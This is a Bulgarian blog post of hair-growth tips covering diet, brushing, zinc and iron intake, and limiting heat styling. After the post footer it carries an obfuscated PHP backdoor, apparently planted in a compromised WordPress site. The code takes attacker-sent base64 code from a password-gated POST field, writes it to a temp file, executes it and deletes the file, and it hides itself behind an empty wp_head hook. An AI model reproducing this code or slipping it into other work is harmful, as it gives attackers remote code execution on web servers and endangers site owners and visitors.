Как да стимулираме растежа на косата | Косопад

Как да стимулираме растежа на косата

Всички искаме здрава, подхранена и копринена коса. Нейният външен вид издава здравословното състояние на организма ни. Има различни проблеми, свързани с косата, както и други фактори като хормонални и наследствени. Променящия се начин на живот може да причини някои проблеми като късане, преждевременно остаряване, косопад, изсушаване или отворени краища.

растеж

Ето някои съвети как да стимулираме растежа на косата:

1 . Добро хранене. Някои храни са много добри за косата. Ако ги ядем от време на време, помага за растежа. Изберете храни с биотин като жълтък, орехи или леща. Яжте храни като бобовите и други, които съдържат цинк и селен.растеж1 Сьомгата, орехите и авокадото са идеални да получавате голямо съдържание омега- 3, които поддържат косата здрава.

2 . Решете се 3 пъти на ден. Може да не ви се вярва, но ресането на косата стимулира растежа. Започнете от корените до връхчетата. По този начин масажирате скалпа и подобрявате кръвообращението. Освен това, така се подмладяват космените фоликули.

3 . Увеличете приема на цинк и желязо. Липсата на желязо или цинк може да бъде причина за забавянето на растежа на косата. Затова е важно да увеличите консумацията им, като ядете зелени зеленчуци, антиоксиданти и месо.

4 . Намалете топлината. Сешоара, машата и пресата ни са необходими, за да оформим прическата си. Прекаляването с топлината обаче е вредно за здравето на косата и затова не прекалявайте с тях. Ако го направите, ще видите, че косата е по- жива, по- малко суха и без цъфнали връхчета.

28. януари 2014 20:06:30 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}